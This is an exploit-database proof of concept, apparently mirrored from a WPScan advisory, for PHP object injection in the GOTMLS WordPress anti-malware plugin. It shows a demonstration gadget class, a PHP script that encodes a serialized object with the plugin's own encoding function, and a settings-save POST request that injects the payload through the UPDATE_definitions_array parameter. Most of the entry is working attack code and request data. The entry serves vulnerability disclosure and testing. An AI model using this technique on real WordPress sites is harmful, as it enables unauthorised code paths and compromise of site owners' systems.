## https://sploitus.com/exploit?id=WPEX-ID:2C94E7B6-A9DD-47D4-BB17-20ACB072C825
1. To simulate a gadget chain, put the following code in a plugin:
class Evil {
public function __wakeup() : void {
die("Arbitrary deserialization");
}
}
2. Create and execute file php to encode the content: O:4:"Evil":0:{} with the GOTMLS_encode() function located at /wordpress/wp-content/plugins/gotmls/images/index.php:
<?php
function GOTMLS_encode($unencoded_string) {
if (function_exists("base64_encode"))
$encoded_string = base64_encode($unencoded_string);
elseif (function_exists("mb_convert_encoding"))
$encoded_string = mb_convert_encoding($unencoded_string, "BASE64", "UTF-8");
else
$encoded_string = "Cannot encode: $unencoded_string function_exists: ";
$encoded_array = explode("=", $encoded_string."=");
return strtr($encoded_array[0], "+/0", "-_=").(count($encoded_array)-1);
}
$content = 'O:4:"Evil":0:{};';
echo "Encoded content: ".GOTMLS_encode($content);
//Encoded content: Tzo=OiJFdmlsIjowOnt9Ow3
?>
3. After activating the plugin, click the "Save Settings" button, intercept this request and add the parameter "UPDATE_definitions_array" with encoded content: Tzo=OiJFdmlsIjowOnt9Ow3 in the body request.
---
The view the response of the request made, which will have the "Arbitrary deserialization" message:
POST /wp-admin/admin.php?page=GOTMLS-settings HTTP/1.1
GOTMLS_mt=2a134dd6b9b751d40c74ec13a8dcb991&scan_type=Save&check%5B%5D=potential&scan_what=2&scan_depth=-1&exclude_ext=png%2Cjpg%2Cjpeg%2Cgif%2Cbmp%2Ctif%2Ctiff%2Cpsd%2Csvg%2Cwebp%2Cdoc%2Cdocx%2Cttf%2Cfla%2Cflv%2Cmov%2Cmp3%2Cpdf%2Ccss%2Cpot%2Cpo%2Cmo%2Cso%2Cexe%2Czip%2C7z%2Cgz%2Crar&exclude_dir=&UPDATE_definitions_array=Tzo=OiJFdmlsIjowOnt9Ow3